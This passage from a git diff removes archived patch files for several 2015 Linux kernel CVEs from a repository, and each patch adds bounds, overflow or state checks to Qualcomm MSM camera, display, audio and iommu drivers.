- .../msm/camera_v2/sensor/io/msm_camera_io_util.c   |  11 ++
- .../msm/camera_v2/sensor/io/msm_camera_io_util.h   |   2 +
- 3 files changed, 89 insertions(+), 50 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-index c598555..ff213fc 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-@@ -917,7 +917,8 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 	/* Validate input parameters */
- 	switch (reg_cfg_cmd->cmd_type) {
- 	case VFE_WRITE:
--	case VFE_READ: {
-+	case VFE_READ:
-+	case VFE_WRITE_MB: {
- 		if ((reg_cfg_cmd->u.rw_info.reg_offset >
- 			(UINT_MAX - reg_cfg_cmd->u.rw_info.len)) ||
- 			((reg_cfg_cmd->u.rw_info.reg_offset +
-@@ -943,6 +944,58 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 		}
- 		break;
- 	}
-+
-+	case VFE_WRITE_DMI_16BIT:
-+	case VFE_WRITE_DMI_32BIT:
-+	case VFE_WRITE_DMI_64BIT:
-+	case VFE_READ_DMI_16BIT:
-+	case VFE_READ_DMI_32BIT:
-+	case VFE_READ_DMI_64BIT: {
-+		if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT) {
-+			if ((reg_cfg_cmd->u.dmi_info.hi_tbl_offset <=
-+				reg_cfg_cmd->u.dmi_info.lo_tbl_offset) ||
-+				(reg_cfg_cmd->u.dmi_info.hi_tbl_offset -
-+				reg_cfg_cmd->u.dmi_info.lo_tbl_offset !=
-+				(sizeof(uint32_t)))) {
-+				pr_err("%s:%d hi %d lo %d\n",
-+					__func__, __LINE__,
-+					reg_cfg_cmd->u.dmi_info.hi_tbl_offset,
-+					reg_cfg_cmd->u.dmi_info.hi_tbl_offset);
-+				return -EINVAL;
-+			}
-+			if (reg_cfg_cmd->u.dmi_info.len <= sizeof(uint32_t)) {
-+				pr_err("%s:%d len %d\n",
-+					__func__, __LINE__,
-+					reg_cfg_cmd->u.dmi_info.len);
-+				return -EINVAL;
-+			}
-+			if (((UINT_MAX -
-+				reg_cfg_cmd->u.dmi_info.hi_tbl_offset) <
-+				(reg_cfg_cmd->u.dmi_info.len -
-+				sizeof(uint32_t))) ||
-+				((reg_cfg_cmd->u.dmi_info.hi_tbl_offset +
-+				reg_cfg_cmd->u.dmi_info.len -
-+				sizeof(uint32_t)) > cmd_len)) {
-+				pr_err("%s:%d hi_tbl_offset %d len %d cmd %d\n",
-+					__func__, __LINE__,
-+					reg_cfg_cmd->u.dmi_info.hi_tbl_offset,
-+					reg_cfg_cmd->u.dmi_info.len, cmd_len);
-+				return -EINVAL;
-+			}
-+		}
-+		if ((reg_cfg_cmd->u.dmi_info.lo_tbl_offset >
-+			(UINT_MAX - reg_cfg_cmd->u.dmi_info.len)) ||
-+			((reg_cfg_cmd->u.dmi_info.lo_tbl_offset +
-+			reg_cfg_cmd->u.dmi_info.len) > cmd_len)) {
-+			pr_err("%s:%d lo_tbl_offset %d len %d cmd_len %d\n",
-+				__func__, __LINE__,
-+				reg_cfg_cmd->u.dmi_info.lo_tbl_offset,
-+				reg_cfg_cmd->u.dmi_info.len, cmd_len);
-+			return -EINVAL;
-+		}
-+		break;
-+	}
-+
- 	default:
- 		break;
- 	}
-@@ -956,39 +1009,27 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 		break;
- 	}
- 	case VFE_WRITE_MB: {
--		uint32_t *data_ptr = cfg_data +
--			reg_cfg_cmd->u.rw_info.cmd_data_offset/4;
--
--		if ((UINT_MAX - sizeof(*data_ptr) <
--					reg_cfg_cmd->u.rw_info.reg_offset) ||
--			(resource_size(vfe_dev->vfe_mem) <
--			reg_cfg_cmd->u.rw_info.reg_offset +
--			sizeof(*data_ptr))) {
--			pr_err("%s: VFE_WRITE_MB: Invalid length\n", __func__);
--			return -EINVAL;
--		}
--		msm_camera_io_w_mb(*data_ptr, vfe_dev->vfe_base +
--			reg_cfg_cmd->u.rw_info.reg_offset);
-+		msm_camera_io_memcpy_mb(vfe_dev->vfe_base +
-+			reg_cfg_cmd->u.rw_info.reg_offset,
-+			cfg_data + reg_cfg_cmd->u.rw_info.cmd_data_offset/4,
-+			reg_cfg_cmd->u.rw_info.len);
- 		break;
- 	}
- 	case VFE_CFG_MASK: {
- 		uint32_t temp;
--		if (resource_size(vfe_dev->vfe_mem) <
--				reg_cfg_cmd->u.mask_info.reg_offset)
--			return -EINVAL;
--		temp = msm_camera_io_r(vfe_dev->vfe_base +
--			reg_cfg_cmd->u.mask_info.reg_offset);
--
--		temp &= ~reg_cfg_cmd->u.mask_info.mask;
--		temp |= reg_cfg_cmd->u.mask_info.val;
- 		if ((UINT_MAX - sizeof(temp) <
--					reg_cfg_cmd->u.mask_info.reg_offset) ||
-+			reg_cfg_cmd->u.mask_info.reg_offset) ||
- 			(resource_size(vfe_dev->vfe_mem) <
- 			reg_cfg_cmd->u.mask_info.reg_offset +
- 			sizeof(temp))) {
- 			pr_err("%s: VFE_CFG_MASK: Invalid length\n", __func__);
- 			return -EINVAL;
- 		}
-+		temp = msm_camera_io_r(vfe_dev->vfe_base +
-+			reg_cfg_cmd->u.mask_info.reg_offset);
-+
-+		temp &= ~reg_cfg_cmd->u.mask_info.mask;
-+		temp |= reg_cfg_cmd->u.mask_info.val;
- 		msm_camera_io_w(temp, vfe_dev->vfe_base +
- 			reg_cfg_cmd->u.mask_info.reg_offset);
- 		break;
-@@ -1000,24 +1041,9 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 		uint32_t *hi_tbl_ptr = NULL, *lo_tbl_ptr = NULL;
- 		uint32_t hi_val, lo_val, lo_val1;
- 		if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT) {
--			if ((UINT_MAX - reg_cfg_cmd->u.dmi_info.hi_tbl_offset <
--						reg_cfg_cmd->u.dmi_info.len -
--						sizeof(uint32_t)) ||
--				(reg_cfg_cmd->u.dmi_info.hi_tbl_offset +
--				reg_cfg_cmd->u.dmi_info.len -
--					sizeof(uint32_t) > cmd_len)) {
--				pr_err("Invalid Hi Table out of bounds\n");
--				return -EINVAL;
--			}
- 			hi_tbl_ptr = cfg_data +
- 				reg_cfg_cmd->u.dmi_info.hi_tbl_offset/4;
- 		}
--
--		if (reg_cfg_cmd->u.dmi_info.lo_tbl_offset +
--			reg_cfg_cmd->u.dmi_info.len > cmd_len) {
--			pr_err("Invalid Lo Table out of bounds\n");
--			return -EINVAL;
--		}
- 		lo_tbl_ptr = cfg_data +
- 			reg_cfg_cmd->u.dmi_info.lo_tbl_offset/4;
- 		if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT)
-@@ -1050,24 +1076,17 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 		uint32_t *hi_tbl_ptr = NULL, *lo_tbl_ptr = NULL;
- 		uint32_t hi_val, lo_val, lo_val1;
- 		if (reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT) {
--			if (reg_cfg_cmd->u.dmi_info.hi_tbl_offset +
--				reg_cfg_cmd->u.dmi_info.len -
--					sizeof(uint32_t) > cmd_len) {
--				pr_err("Invalid Hi Table out of bounds\n");
--				return -EINVAL;
--			}
- 			hi_tbl_ptr = cfg_data +
- 				reg_cfg_cmd->u.dmi_info.hi_tbl_offset/4;
- 		}
- 
--		if (reg_cfg_cmd->u.dmi_info.lo_tbl_offset +
--			reg_cfg_cmd->u.dmi_info.len > cmd_len) {
--			pr_err("Invalid Lo Table out of bounds\n");
--			return -EINVAL;
--		}
- 		lo_tbl_ptr = cfg_data +
- 			reg_cfg_cmd->u.dmi_info.lo_tbl_offset/4;
- 
-+		if (reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT)
-+			reg_cfg_cmd->u.dmi_info.len =
-+				reg_cfg_cmd->u.dmi_info.len / 2;
-+
- 		for (i = 0; i < reg_cfg_cmd->u.dmi_info.len/4; i++) {
- 			lo_val = msm_camera_io_r(vfe_dev->vfe_base +
- 					vfe_dev->hw_info->dmi_reg_offset + 0x4);
-@@ -1121,7 +1140,7 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 			if ((data_ptr < cfg_data) ||
- 				(UINT_MAX / sizeof(*data_ptr) <
- 				 (data_ptr - cfg_data)) ||
--				(sizeof(*data_ptr) * (data_ptr - cfg_data) >
-+				(sizeof(*data_ptr) * (data_ptr - cfg_data) >=
- 				 cmd_len))
- 				return -EINVAL;
- 			*data_ptr++ = msm_camera_io_r(vfe_dev->vfe_base +
-@@ -1187,6 +1206,13 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 	case SET_WM_UB_SIZE:
- 		break;
- 	case SET_UB_POLICY: {
-+
-+		if (cmd_len < sizeof(vfe_dev->vfe_ub_policy)) {
-+			pr_err("%s:%d failed: invalid cmd len %u exp %zu\n",
-+				__func__, __LINE__, cmd_len,
-+				sizeof(vfe_dev->vfe_ub_policy));
-+			return -EINVAL;
-+		}
- 		vfe_dev->vfe_ub_policy = *cfg_data;
- 		break;
- 	}
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.c
-index 78b9148..41c784a 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.c
-@@ -102,6 +102,17 @@ void msm_camera_io_memcpy(void __iomem *dest_addr,
- 	msm_camera_io_dump(dest_addr, len);
- }
- 
-+void msm_camera_io_memcpy_mb(void __iomem *dest_addr,
-+	void __iomem *src_addr, u32 len)
-+{
-+	int i;
-+	u32 *d = (u32 *) dest_addr;
-+	u32 *s = (u32 *) src_addr;
-+
-+	for (i = 0; i < (len / 4); i++)
-+		msm_camera_io_w_mb(*s++, d++);
-+}
-+
- int msm_cam_clk_sel_src(struct device *dev, struct msm_cam_clk_info *clk_info,
- 		struct msm_cam_clk_info *clk_src_info, int num_clk)
- {
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.h b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.h
-index fa9a283..2a0e21c 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.h
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.h
-@@ -38,6 +38,8 @@ u32 msm_camera_io_r_mb(void __iomem *addr);
- void msm_camera_io_dump(void __iomem *addr, int size);
- void msm_camera_io_memcpy(void __iomem *dest_addr,
- 		void __iomem *src_addr, u32 len);
-+void msm_camera_io_memcpy_mb(void __iomem *dest_addr,
-+	void __iomem *src_addr, u32 len);
- int msm_cam_clk_sel_src(struct device *dev, struct msm_cam_clk_info *clk_info,
- 		struct msm_cam_clk_info *clk_src_info, int num_clk);
- int msm_cam_clk_enable(struct device *dev, struct msm_cam_clk_info *clk_info,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8939/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8939/ANY/0001.patch
deleted file mode 100644
index 05b7d3ad..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8939/ANY/0001.patch
+++ /dev/null
@@ -1,67 +0,0 @@
-From 884cff808385788fa620833c7e2160a4b98a21da Mon Sep 17 00:00:00 2001
-From: raghavendra ambadas <rambad@codeaurora.org>
-Date: Mon, 16 Mar 2015 18:10:35 +0530
-Subject: msm_fb: display: validate input args of mdp4_argc_process_write_req
-
-A bounds check has to be done for r/g/b stages variables
-to avoid undetermined behaviour.
-
-Change-Id: Ibdc96e79b36cf188d4b5c42d8e2d9ece8e9ace8a
-Signed-off-by: Raghavendra Ambadas <rambad@codeaurora.org>
----
- drivers/video/msm/mdp4_util.c | 29 ++++++++++++++++++++++++++---
- 1 file changed, 26 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/video/msm/mdp4_util.c b/drivers/video/msm/mdp4_util.c
-index f8b7f2f..cfcccdb 100644
---- a/drivers/video/msm/mdp4_util.c
-+++ b/drivers/video/msm/mdp4_util.c
-@@ -2739,19 +2739,42 @@ static int mdp4_argc_process_write_req(uint32_t *offset,
- 	struct mdp_ar_gc_lut_data r[MDP_AR_GC_MAX_STAGES];
- 	struct mdp_ar_gc_lut_data g[MDP_AR_GC_MAX_STAGES];
- 	struct mdp_ar_gc_lut_data b[MDP_AR_GC_MAX_STAGES];
-+	uint8_t num_r_stages;
-+	uint8_t num_g_stages;
-+	uint8_t num_b_stages;
-+
-+	if (get_user(num_r_stages, &pgc_ptr->num_r_stages)) {
-+		pr_err("%s failed: num_r_stages : Invalid arg\n", __func__);
-+		return -EFAULT;
-+	}
-+
-+	if (get_user(num_g_stages, &pgc_ptr->num_g_stages)) {
-+		pr_err("%s failed: num_g_stages : Invalid arg\n", __func__);
-+		return -EFAULT;
-+	}
-+
-+	if (get_user(num_b_stages, &pgc_ptr->num_b_stages)) {
-+		pr_err("%s failed: num_b_stages : Invalid arg\n", __func__);
-+		return -EFAULT;
-+	}
-+
-+	if ((!num_r_stages || num_r_stages > MDP_AR_GC_MAX_STAGES) ||
-+		(!num_g_stages || num_g_stages > MDP_AR_GC_MAX_STAGES) ||
-+		(!num_b_stages || num_b_stages > MDP_AR_GC_MAX_STAGES))
-+		return -EINVAL;
- 
- 	ret = copy_from_user(&r[0], pgc_ptr->r_data,
--		pgc_ptr->num_r_stages * sizeof(struct mdp_ar_gc_lut_data));
-+		num_r_stages * sizeof(struct mdp_ar_gc_lut_data));
- 
- 	if (!ret) {
- 		ret = copy_from_user(&g[0],
- 				pgc_ptr->g_data,
--				pgc_ptr->num_g_stages
-+				num_g_stages
- 				* sizeof(struct mdp_ar_gc_lut_data));
- 		if (!ret)
- 			ret = copy_from_user(&b[0],
- 					pgc_ptr->b_data,
--					pgc_ptr->num_b_stages
-+					num_b_stages
- 					* sizeof(struct mdp_ar_gc_lut_data));
- 	}
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8940/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8940/ANY/0001.patch
deleted file mode 100644
index 40f6f6f5..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8940/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From e13ebd727d161db7003be6756e61283dce85fa3b Mon Sep 17 00:00:00 2001
-From: Bhalchandra Gajare <gajare@codeaurora.org>
-Date: Tue, 10 Feb 2015 14:44:36 -0800
-Subject: ASoC: q6lsm: Add check for integer overflow
-
-During sound model registration, the total memory size needed by the
-sound model data is the sum of sound model length, number of zero
-padding bytes and the calibration size. It is possible this sum
-can result into integer overflow causing difficult to debug issues.
-Add check for integer overflow to avoid such possible issues.
-
-CRs-fixed: 792367
-Change-Id: I9f451aa308214a4eac42b82e2abf1375c858ff30
-Signed-off-by: Bhalchandra Gajare <gajare@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/q6lsm.c | 11 ++++++++++-
- 1 file changed, 10 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/q6lsm.c b/sound/soc/msm/qdsp6v2/q6lsm.c
-index db29115..67be542 100644
---- a/sound/soc/msm/qdsp6v2/q6lsm.c
-+++ b/sound/soc/msm/qdsp6v2/q6lsm.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2014, Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2015, Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -1055,6 +1055,15 @@ int q6lsm_snd_model_buf_alloc(struct lsm_client *client, size_t len)
- 		client->sound_model.size = len;
- 		pad_zero = (LSM_ALIGN_BOUNDARY -
- 			    (len % LSM_ALIGN_BOUNDARY));
-+		if ((len > SIZE_MAX - pad_zero) ||
-+		    (len + pad_zero >
-+		     SIZE_MAX - cal_block->cal_data.size)) {
-+			pr_err("%s: invalid allocation size, len = %zd, pad_zero =%zd, cal_size = %zd\n",
-+				__func__, len, pad_zero,
-+				cal_block->cal_data.size);
-+			rc = -EINVAL;
-+			goto fail;
-+		}
- 
- 		total_mem = PAGE_ALIGN(pad_zero + len +
- 			cal_block->cal_data.size);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8941/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8941/ANY/0001.patch
deleted file mode 100644
index b52c04b1..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8941/ANY/0001.patch
+++ /dev/null
@@ -1,159 +0,0 @@
-From d4d4d1dd626b21e68e78395bab3382c1eb04877f Mon Sep 17 00:00:00 2001
-From: Petar Sivenov <psiven@codeaurora.org>
-Date: Tue, 10 Feb 2015 13:46:18 +0200
-Subject: msm:camera:isp: fix array index bound checks
-
-This change fixes several incorrect or missing array index bound checks.
-
-Change-Id: Icd96555c01330ec11e94c6173d8df1973fe39c33
-Signed-off-by: Petar Sivenov <psiven@codeaurora.org>
----
- .../platform/msm/camera_v2/isp/msm_isp_axi_util.c  | 56 ++++++++++++++--------
- 1 file changed, 36 insertions(+), 20 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-index e3be614..bc993cd 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-@@ -368,8 +368,8 @@ int msm_isp_axi_check_stream_state(
- 		return -EINVAL;
- 
- 	for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
--		if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])
--		> MAX_NUM_STREAM) {
-+		if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i]) >=
-+			MAX_NUM_STREAM) {
- 			return -EINVAL;
- 		}
- 		stream_info = &axi_data->stream_info[
-@@ -676,8 +676,10 @@ int msm_isp_request_axi_stream(struct vfe_device *vfe_dev, void *arg)
- 		&vfe_dev->axi_data, stream_cfg_cmd);
- 	if (rc) {
- 		pr_err("%s: Request validation failed\n", __func__);
--		msm_isp_axi_destroy_stream(&vfe_dev->axi_data,
--			HANDLE_TO_IDX(stream_cfg_cmd->axi_stream_handle));
-+		if (HANDLE_TO_IDX(stream_cfg_cmd->axi_stream_handle) <
-+			MAX_NUM_STREAM)
-+			msm_isp_axi_destroy_stream(&vfe_dev->axi_data,
-+			      HANDLE_TO_IDX(stream_cfg_cmd->axi_stream_handle));
- 		return rc;
- 	}
- 	stream_info = &vfe_dev->axi_data.
-@@ -748,11 +750,17 @@ int msm_isp_release_axi_stream(struct vfe_device *vfe_dev, void *arg)
- 	int rc = 0, i;
- 	struct msm_vfe_axi_stream_release_cmd *stream_release_cmd = arg;
- 	struct msm_vfe_axi_shared_data *axi_data = &vfe_dev->axi_data;
--	struct msm_vfe_axi_stream *stream_info =
--		&axi_data->stream_info[
--		HANDLE_TO_IDX(stream_release_cmd->stream_handle)];
-+	struct msm_vfe_axi_stream *stream_info;
- 	struct msm_vfe_axi_stream_cfg_cmd stream_cfg;
- 
-+
-+	if (HANDLE_TO_IDX(stream_release_cmd->stream_handle) >=
-+		MAX_NUM_STREAM) {
-+		pr_err("%s: Invalid stream handle\n", __func__);
-+		return -EINVAL;
-+	}
-+	stream_info = &axi_data->stream_info[
-+		HANDLE_TO_IDX(stream_release_cmd->stream_handle)];
- 	if (stream_info->state == AVALIABLE) {
- 		pr_err("%s: Stream already released\n", __func__);
- 		return -EINVAL;
-@@ -1069,6 +1077,11 @@ static void msm_isp_process_done_buf(struct vfe_device *vfe_dev,
- 	uint8_t drop_frame = 0;
- 	memset(&buf_event, 0, sizeof(buf_event));
- 
-+	if (stream_idx >= MAX_NUM_STREAM) {
-+		pr_err("%s: Invalid stream_idx", __func__);
-+		return;
-+	}
-+
- 	frame_id = vfe_dev->axi_data.
- 		src_info[SRC_TO_INTF(stream_info->stream_src)].frame_id;
- 
-@@ -1235,8 +1248,8 @@ static void msm_isp_update_camif_output_count(
- 		return;
- 
- 	for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
--		if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])
--		> MAX_NUM_STREAM) {
-+		if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i]) >=
-+			MAX_NUM_STREAM) {
- 			return;
- 		}
- 		stream_info =
-@@ -1535,8 +1548,8 @@ static int msm_isp_axi_update_cgc_override(struct vfe_device *vfe_dev,
- 		return -EINVAL;
- 
- 	for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
--		if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])
--		> MAX_NUM_STREAM) {
-+		if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i]) >=
-+				MAX_NUM_STREAM) {
- 			return -EINVAL;
- 		}
- 		stream_info = &axi_data->stream_info[
-@@ -1567,8 +1580,8 @@ static int msm_isp_start_axi_stream(struct vfe_device *vfe_dev,
- 		return -EINVAL;
- 
- 	for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
--		if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])
--		> MAX_NUM_STREAM) {
-+		if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i]) >=
-+			MAX_NUM_STREAM) {
- 			return -EINVAL;
- 		}
- 		stream_info = &axi_data->stream_info[
-@@ -1651,8 +1664,8 @@ static int msm_isp_stop_axi_stream(struct vfe_device *vfe_dev,
- 		return -EINVAL;
- 
- 	for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
--		if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])
--		> MAX_NUM_STREAM) {
-+		if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i]) >=
-+			MAX_NUM_STREAM) {
- 			return -EINVAL;
- 		}
- 		stream_info = &axi_data->stream_info[
-@@ -1916,8 +1929,8 @@ int msm_isp_update_axi_stream(struct vfe_device *vfe_dev, void *arg)
- 	for (i = 0; i < update_cmd->num_streams; i++) {
- 		update_info = &update_cmd->update_info[i];
- 		/*check array reference bounds*/
--		if (HANDLE_TO_IDX(update_info->stream_handle)
--		 > MAX_NUM_STREAM) {
-+		if (HANDLE_TO_IDX(update_info->stream_handle) >=
-+			MAX_NUM_STREAM) {
- 			return -EINVAL;
- 		}
- 		stream_info = &axi_data->stream_info[
-@@ -2082,7 +2095,9 @@ void msm_isp_process_axi_irq(struct vfe_device *vfe_dev,
- 		comp_info = &axi_data->composite_info[i];
- 		wm_mask &= ~(comp_info->stream_composite_mask);
- 		if (comp_mask & (1 << i)) {
--			if (!comp_info->stream_handle) {
-+			stream_idx = HANDLE_TO_IDX(comp_info->stream_handle);
-+			if ((!comp_info->stream_handle) ||
-+				(stream_idx >= MAX_NUM_STREAM)) {
- 				pr_err("%s: Invalid handle for composite irq\n",
- 					__func__);
- 				continue;
-@@ -2118,12 +2133,13 @@ void msm_isp_process_axi_irq(struct vfe_device *vfe_dev,
- 
- 	for (i = 0; i < axi_data->hw_info->num_wm; i++) {
- 		if (wm_mask & (1 << i)) {
--			if (!axi_data->free_wm[i]) {
-+			stream_idx = HANDLE_TO_IDX(axi_data->free_wm[i]);
-+			if ((!axi_data->free_wm[i]) ||
-+				(stream_idx >= MAX_NUM_STREAM)) {
- 				pr_err("%s: Invalid handle for wm irq\n",
- 					__func__);
- 				continue;
- 			}
--			stream_idx = HANDLE_TO_IDX(axi_data->free_wm[i]);
- 			stream_info = &axi_data->stream_info[stream_idx];
- 			ISP_DBG("%s: stream id %x frame id: 0x%x\n", __func__,
- 				stream_info->stream_id, stream_info->frame_id);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8942/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8942/ANY/0001.patch
deleted file mode 100644
index 7bb486f8..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8942/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From 9ec380c06bbd79493828fcc3c876d8a53fd3369f Mon Sep 17 00:00:00 2001
-From: Iliya Varadzhakov <ivarad@codeaurora.org>
-Date: Fri, 13 Mar 2015 07:33:18 -0700
-Subject: msm: cpp: Update iommu handling
-
-CPP has to check for stream state before operate iommu
-contexts.
-
-Change-Id: I69e6266e1ff2d1cd93e7191f2c43c887154abae0
-Signed-off-by: Iliya Varadzhakov <ivarad@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index 784e882..96b1641 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2662,7 +2662,8 @@ STREAM_BUFF_END:
- 		break;
- 	}
- 	case VIDIOC_MSM_CPP_IOMMU_DETACH: {
--		if (cpp_dev->iommu_state == CPP_IOMMU_STATE_ATTACHED) {
-+		if ((cpp_dev->iommu_state == CPP_IOMMU_STATE_ATTACHED) &&
-+			(cpp_dev->stream_cnt == 0)) {
- 			iommu_detach_device(cpp_dev->domain,
- 				cpp_dev->iommu_ctx);
- 			cpp_dev->iommu_state = CPP_IOMMU_STATE_DETACHED;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8943/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8943/ANY/0001.patch
deleted file mode 100644
index 0121bbc2..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8943/ANY/0001.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From ad376e4053b87bd58f62f45b6df2c5544bc21aee Mon Sep 17 00:00:00 2001
-From: Jayant Shekhar <jshekhar@codeaurora.org>
-Date: Tue, 20 Jan 2015 16:12:43 +0530
-Subject: msm: mdss: Unmap only when buffer was mapped
-
-Currently buffer is unmapped if iommu is attached.
-This can lead to potential unmap issues if wrong
-addresses are sent and are tried to unmap without
-mapping. Hence ensure unmap is done only when
-buffer is mapped.
-
-Change-Id: I6d7f1eb1e951cd314a4c3c35551c87930af5118e
-Signed-off-by: Jayant Shekhar <jshekhar@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_mdp.h      | 1 +
- drivers/video/msm/mdss/mdss_mdp_util.c | 4 +++-
- 2 files changed, 4 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_mdp.h b/drivers/video/msm/mdss/mdss_mdp.h
-index f5f5770..99ea0cd 100644
---- a/drivers/video/msm/mdss/mdss_mdp.h
-+++ b/drivers/video/msm/mdss/mdss_mdp.h
-@@ -279,6 +279,7 @@ struct mdss_mdp_img_data {
- 	u32 len;
- 	u32 flags;
- 	int p_need;
-+	bool mapped;
- 	struct file *srcp_file;
- 	struct ion_handle *srcp_ihdl;
- };
-diff --git a/drivers/video/msm/mdss/mdss_mdp_util.c b/drivers/video/msm/mdss/mdss_mdp_util.c
-index 01745fd..dd93dce 100644
---- a/drivers/video/msm/mdss/mdss_mdp_util.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_util.c
-@@ -502,7 +502,7 @@ int mdss_mdp_put_img(struct mdss_mdp_img_data *data)
- 			pr_err("invalid ion client\n");
- 			return -ENOMEM;
- 		} else {
--			if (is_mdss_iommu_attached()) {
-+			if (data->mapped) {
- 				int domain;
- 				if (data->flags & MDP_SECURE_OVERLAY_SESSION)
- 					domain = MDSS_IOMMU_DOMAIN_SECURE;
-@@ -515,6 +515,7 @@ int mdss_mdp_put_img(struct mdss_mdp_img_data *data)
- 					msm_ion_unsecure_buffer(iclient,
- 							data->srcp_ihdl);
- 				}
-+				data->mapped = false;
- 			}
- 			ion_free(iclient, data->srcp_ihdl);
- 			data->srcp_ihdl = NULL;
-@@ -593,6 +594,7 @@ int mdss_mdp_get_img(struct msmfb_data *img, struct mdss_mdp_img_data *data)
- 			if (ret && (domain == MDSS_IOMMU_DOMAIN_SECURE))
- 				msm_ion_unsecure_buffer(iclient,
- 						data->srcp_ihdl);
-+			data->mapped = true;
- 		} else {
- 			ret = ion_phys(iclient, data->srcp_ihdl, start,
- 				       (size_t *) len);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8944/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8944/ANY/0001.patch
deleted file mode 100644
index 7bce069e..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8944/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From e758417e7c31b975c862aa55d0ceef28f3cc9104 Mon Sep 17 00:00:00 2001
-From: Biswajit Paul <biswajitpaul@codeaurora.org>
-Date: Mon, 9 Feb 2015 15:21:12 -0800
-Subject: kernel: Restrict permissions of /proc/iomem.
-
-The permissions of /proc/iomem currently are -r--r--r--. Everyone can
-see its content. As iomem contains information about the physical memory
-content of the device, restrict the information only to root.
-
-Change-Id: If0be35c3fac5274151bea87b738a48e6ec0ae891
-CRs-Fixed: 786116
-Signed-off-by: Biswajit Paul <biswajitpaul@codeaurora.org>
-Signed-off-by: Avijit Kanti Das <avijitnsec@codeaurora.org>
----
